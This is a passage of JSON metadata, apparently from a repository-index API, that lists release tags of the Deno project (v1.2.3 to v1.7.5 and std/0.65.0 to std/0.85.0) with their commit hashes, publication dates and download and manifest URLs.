.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_u